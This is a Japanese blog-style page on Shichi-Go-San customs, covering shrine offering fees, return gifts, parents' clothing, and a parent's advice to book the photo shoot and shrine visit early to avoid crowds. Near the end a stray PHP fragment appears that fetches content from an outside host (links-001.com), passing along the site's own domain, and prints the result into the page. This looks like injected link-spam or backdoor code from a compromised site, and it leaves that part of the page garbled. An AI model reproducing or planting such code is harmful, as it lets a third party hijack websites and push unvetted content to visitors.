前へ
次へ

七五三の初穂料、あれこれ

「初穂料」とは神社に七五三の祝詞をあげてもらい、お祓いしてもらうことへの謝礼です。いったいいくら納め

more

七五三の内祝いについて

七五三の内祝いについて調べてみました。頂いた金額の半分ぐらいの値段の品物を送るのが一般的と言われてい

more

喜ばれる七五三の内祝いなら

七五三のお祝いをいただいた際、内祝いは何をお返ししようかと悩むことも多いかと思います。内祝いはもらっ

more

七五三の撮影とお参りの時期

七五三の服装について書いてみました。参考にしてみてください。どれもおしゃれで上品に見えます。母親の場合はワンピースなどが無難です。子供が主役の行事なのでそれ以上に派手にならなければ特に問題はないです。ブラックフォーマルもあまり着ない方がいいものです。祝いの席なのでもう少し華やいだ服装がいいとおもいます。リクルートスーツのようなものの場合もアクセントをつけておしゃれをした方がいいです。コサージュやブローチを付けると華やかです。ストッキングはなるべくベージュにした方がいいです。控えめで清潔感があることが何より大事です。父親はスーツが無難です。大半の人が着ます。事前にクリーニングをしておくことが大事です。我が家には、5歳と3歳の娘がいます。今年は下の娘の3歳の七五三のお祝いをしました。今は写真撮影は早めに終わらせ、11月15日前後に神社でのお参りをするのが、一般的です。大手チェーンの写真館などでは早めに撮影をすると色々と特典が多くお得です。上の娘が3歳の七五三の時にも、早めの撮影に関してはサービスが多かったのですが、初めてという事もあり11月という一番混雑する時期に撮影と神社へのお参りをしました。やはり当日は撮影スタジオも混雑しており、撮影も流れ作業的にならざるを得ない状況でした。神社でのお参りも周りは皆七五三だらけで、神社内で個人的に写真を撮るにも人が多すぎて苦労した覚えがあります。今年、下の娘が3歳の撮影では時期を外して、9月に撮影、お参りというスケジュールにし、上の娘と同じ撮影スタジオを利用しました。すべてにおいて余裕があり、子供も落ち着いて笑顔の多い撮影が出来ました。そして、神社のお参りも早かった為か、我が家しかおらず、ゆっくりとお参り出来ました。以上の経験があってから、こだわらないのであれば、七五三の時期をずらす事をアドバイスするようになりました。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top